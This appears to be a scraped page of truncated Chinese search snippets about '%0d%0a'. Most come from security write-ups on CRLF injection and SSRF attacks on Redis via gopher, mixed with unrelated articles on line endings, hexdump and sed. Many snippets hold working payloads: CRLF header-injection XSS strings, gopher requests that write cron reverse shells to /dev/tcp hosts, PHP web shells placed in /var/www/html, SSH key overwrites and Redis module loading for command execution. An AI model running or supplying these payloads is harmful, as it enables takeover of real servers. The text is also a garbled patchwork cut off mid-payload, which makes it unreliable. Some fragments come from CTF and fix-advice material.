name=Bob%0d%0a%0d%0aalert(document.domain) 上面将在受攻击域的上下文中显示一个警报窗口。 实战案例: ?.../%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert...:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP标头注入...98%8Dheader:header %0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert...%0d%0aHTTP%2f1.1%20200%20OK%0d%0aContent-Type:%20text%2fhtml%0d%0a%0d%0a%3Cscript%3Ealert('XSS');%3C%
前段时间项目中遇到一个杀猪盘,一直很忙没有看,最近闲下来就看了一下,没发现什么明显的漏洞,就在Fofa上通过特征搜了一批同类型的站扫源码备份,运气很好,扫到一份 SSRF 本来找到一处任意上传,但是在目标上面已经被删除...删除从开头的行之间的行,因为这是返回的数据,这里不需要 将\r换行字符串替换成%0d%0a 开头为*的数字为数组元素数量,开头为的数字为字符数量,也就是说*3后面需要跟3个x Gopher...0d%0a%0a%0d%0a%0d%0a%0a%0d%0a%0d%0a*1%0d%0a 保存:*2%0d%0a4%0d%0aAUTH%0d%0a8%0d%0aqq123456%0d%0a*1%0d%0a4%0d%0asave%0d...%0a*1%0d%0a4%0d%0aquit%0d%0a 发现没有写进去,目标机器为Linux,猜测是权限的问题(可能网站路径都是755,而redis权限想写进去最后一位权限得是7(读写执行)、6(写执行
Windows:使用CRLF表示行的结束 Linux/Unix:使用LF表示行的结束 MacOS:早期使用CR表示,现在好像也用LF表示行的结束 在HTTP规范中,行应该使用CRLF来结束。...%0a %0d%0a%0d%0a r%0d%0aContentLength:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContentType:%20text/html...%0d%0aContentLength:%2019%0d%0a%0d%0aInjected%02Content %0d%0d%0a%0a 0x0D0x0A 0x0D0x0D0x0A0x0A...:html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3Ehttp://www.test.com %0d%0a%0d%0a%3Chtml%3E%3Cbody...(%22XSS%22)%3C/script%3E %0d%0a%0d%0a%3Cscript%3Ealert(%22XSS%22)%3C%2Fscript%3E %0A%0A%3Cscript%3Ealert
57 6F 72 6C 64 0A 4、rb+ 与 r+ 对比 在上面使用 ” rb+ ” 的方式打开文件 , 是以二进制形式打开的文件 , 二进制输出内容为 48 65 6C 6C 6F 0A 57...6F 72 6C 64 0A 下面的代码中 , 使用 ” r+ ” 的方式打开文件 , 是以文本形式打开的文件 , 二进制输出内容为 48 65 6C 6C 6F 0D 0A 57 6F 72 6C...64 0D 0A 其中 0D 是 ‘\r’ , 0A 是 ‘\n’ , 文本形式中换行被解析为 “\r\n” , 二进制形式只有 ‘\n’ ; 在 Windows 系统下 , 文本都是以 “\r\n”...作为换行符号 ; 在 Linux / Unix 系统下 , 文本都是以 ‘\n’ 作为换行符号 ; 代码示例 : #include int main() { //...0A , 二进制方式下 , 将数据原封不动输出 ; 在 Windows 下使用文本模式和二进制模式读写数据是不同的 ; 但在 Linux / Unix 下使用文本模式和二进制模式读写文件没有区别 ;
php header("Location: gopher://172.28.100.108:6379/_*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$62%0d%0a...%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/hacker.xxxx.com/9999 0>&1%0a%0a%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig...%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%...0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0a*1%0d%0a$4%0d%0aquit...0X08 可能遇到的问题 以下问题是因为我用的linux上vim编辑器导致的,后使用Sublime编辑器解决了乱码问题 ?
%0A%0D%0Aset%201%20%22\n\n\n\n*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.42.138%...%0D%0Asave%0D%0A%0D%0Aqwezxc 4.漏洞环境 靶机:192.168.42.145 Redis容器:172.25.0.2 Kali:192.168.42.138 5.漏洞复现 切换到...%0A%0D%0Aset%201%20%22\n\n\n\n*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.42.138%...%0D%0Asave%0D%0A%0D%0Aqwezxc 等待一会,成功反弹shell 查看redis容器的/etc/crontab,命令被成功写到crontab中 7.修复方案 方法一: 删除uddiexplorer...文件夹 限制uddiexplorer应用只能内网访问 方法二: 将SearchPublicRegistries.jsp直接删除 方法三: Weblogic服务端请求伪造漏洞出现在uddi组件(所以安装Weblogic
%0a%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$11%0d%0a/root/.ssh/%0d%...0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$15%0d%0aauthorized_keys%0d%0a...%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%...0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0a*1%0d%0a$4%0d%0aquit%0d%0a 解码后的内容就是:...5.4 漏洞修复 5.4.1 删除server/lib/uddiexplorer.war下的相应jsp文件。
%0d%0aContent-Length:%2019%0d%0a%0d%0adeface ?...2、提交%0D%0A字符,验证服务器是否响应%0D%0A,若过滤可以通过双重编码绕过。 3、漏洞利用,使杀伤最大化,将漏洞转化为HTML注入,XSS,缓存等。...在将数据传送到http响应头之前,删除所有的换行符。...%0aheader:header CRLF-XSS: %0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload...%2fhtml%0d%0aHTTP%2f1.1%20200%20OK%0d%0aContent-Type:%20text%2fhtml%0d%0a%0d%0a%3Cscript%3Ealert('XSS
%0a%24%38%0d%0a%66%6c%75%73%68%61%6c%6c%0d%0a%2a%33%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%31%0d%0a%31%0d...%34%0d%0a%24%36%0d%0a%63%6f%6e%66%69%67%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%33%0d%0a%64%69%72%0d%0a%24%...69%67%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%31%30%0d%0a%64%62%66%69%6c%65%6e%61%6d%65%0d%0a%24%34%0d%0a...%0a%2a%34%0d%0a%24%36%0d%0a%63%6f%6e%66%69%67%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%33%0d%0a%64%69%72%0d...0d%0a%72%6f%6f%74%0d%0a%2a%31%0d%0a%24%34%0d%0a%73%61%76%65%0d%0a --cookie"cookie" 成功反弹shell
hexdump命令是Linux下的打印16进制的利器,它可以按我们指定的格式输出16进制,特别有用,配合eeprom来用简直是绝配。...0B 0C 0D 0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 23 24 25 26 27 28 29 2A...2B 2C 2D 2E 2F 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B...#$%&'()*+,-./ 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F | ................ 10 11 12 13 14 15...如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
a=1%0d%0a*2%0d%0a$4%0d%0aauth%0d%0a$13%0d%0aredis123456aB%0d%0a*4%0d%0a$6%0d%0aCONFIG%0d%0a$3%0d%0aSET...a=1%0d%0a*2%0d%0a$4%0d%0aauth%0d%0a$13%0d%0aredis123456aB%0d%0a*3%0d%0a$6%0d%0aMODULE%0d%0a$4%0d%0aLOAD.../exp.so%0d%0a*3%0d%0a$6%0d%0aMODULE%0d%0a$4%0d%0aLOAD%0d%0a$8%0d%0a..../exp.so%0d%0a*3%0d%0a$6%0d%0aMODULE%0d%0a$4%0d%0aLOAD%0d%0a$8%0d%0a..../exp.so%0d%0a*3%0d%0a$7%0d%0aSLAVEOF%0d%0a$2%0d%0aNO%0d%0a$3%0d%0aONE%0d%0a*2%0d%0a$11%0d%0asystem.exec
转化思路: 将get请求报文/post请求报文先进行url编码,然后将%0A 全部替换为%0D%0A即可 比如说: 该页面存在一个ssrf漏洞: <?...__main__': main() gopher对redis的利用: redis没有密码 思路: 利用ssrf漏洞,通过gopher协议向redis发送一个请求,让redis将数据库文件保存到linux...%0a1%0d%0a1%0d%0a58%0d%0a%0a %0a%0a*/1 * * * * bash -i >& /dev/tcp/127.0.0.1/2333 0>&1%0a%0a%0a%0a%0d...%0a*4%0d%0a3%0d%0aset%0d%0a3%0d% 0adir%0d%0a16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a6%0d%0aconfig%0d%0a3%...0d%0 aset%0d%0a10%0d%0adbfilename%0d%0a4%0d%0aroot%0d%0a*1%0d%0a4%0d%0asave%0 d%0a*1%0d%0a 需要注意的是,如果要换
和%0A。...攻击 参数后面加上%0D%0A然后拼接内容如果有响应就是存在该漏洞 curl -i https://www.baidu.com/#/%0D%0ASet-Cookie:%20CRLF_Injection_By_ze2pac...%0d%0a%0d%0a htmli html注入: GET /%0d%0a%0d%0a%3Ch1%3Eze2pac%3C%2Fh1%3E...%0a%0d%0a%3Ch1%3Eze2pac%3C%2Fh1%3E%0A%3Cp%3ECRLF%20Injection%20PoC%3C%2Fh1%3E 解码为 ze2pac <...在将数据传送到http响应头之前,删除所有的换行符。
我们有时在Windows编辑的文件,放到了Linux环境中,打开文件,可能发现每行结尾多了一个“^M”,导致一些在Windows下能执行的解析程序,放到了Linux中,执行就会报错,问题就出在这个"^M...Dos、Windows格式的文件,用0D 0A(CR+LF)作为换行符,而Linux/Unix的则是以0A(LF)作为换行符,因此以Dos底下的文本文件到了Linux,换行符就会多出来一个0D(CR),...在Linux中vim是无法显示\r,因为ascii中对应的不是Linux中的标准acsii字符,其实其对应的ASCII码十进制形式是13(无显示形式),对应的八进制形式是15(显示为^M)。...在Windows下使用文本工具进行转换win-->linux,例如notepad++、UltraEdit直接进行转换。 2. 在Linux下,可以用dos2unix file,将文件转换格式。 3....在Linux下,可以用cat file | tr -d "\r" > new_file,进行替换。 4.
是否写入成功 body中命令执行查看flag web360: 题目提示:redis 题目: 利用gopherus脚本生成payload gopher://127.0.0.1:6379/_%2A1%0D...%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2430%0D%0A%0A%0A%3C%3Fphp%20eval...%28%24_POST%5Bcmd%5D%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D...%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D...%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A gopher://127.0.0.1:6379
这个模式空间的概念可能听起来有点生疏,其实就是临时缓冲区;换个名称而已;对模式空间的使用举例: 通常把Linux下的文本文件换行符(\n)变为windows下的换行符号(\r\n), 我们不可以直接用...53 4b 5f 4d 42 47 2e 0a #结果中有三个0x0a, 表示3行;此为linux格式 [root@localhost ~]# [root@localhost ~]...所以仍然可以匹配到前一行的换行符,从而实现替换;看下面的结果: [root@localhost ~]# cat testfile.txt | od -An -txC 31 32 33 34 35 0d...'2,$N;s/\n/\r\n/' testfile.txt [root@localhost ~]# cat testfile.txt | od -An -txC 31 32 33 34 35 0d...0a 61 62 63 64 65 66 67 73 0d 0a 41 53 4b 5f 4d 42 47 2e 0a #以双数作为开始行,那么这里第二行也替换成功 [root@localhost
00%00%01%05%00%01%008%04%00%3C%3Fphp%20system%28%27ls%20/%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A...%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2434%0D%0A%0A%0A%3C%3Fphp%20system...%28%24_GET%5B%27cmd%27%5D%29%3B%20%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%...0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A...%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A 把编码后的作为get参数传入url
python2环境下运行后将得到的结果提交过去 gopher://173.235.203.11:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%...0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2431%0D%0A%0A%0A%3C%3Fphp%20eval%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E...%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www.../html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php...%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A ?
socket from urllib.parse import unquote # 对gopherus生成的payload进行一次urldecode payload = unquote("_%2A1%0D...%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Axxx%0D%0A%2432%0D%0A%0A%0A%3C%3Fphp...%20eval%28%24_GET%5B%2213%22%5D%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%...0D%0A%243%0D%0Adir%0D%0A%2420%0D%0A/var/www/html/public%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%...0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A ") payload
领取专属 10元无门槛券
手把手带您无忧上云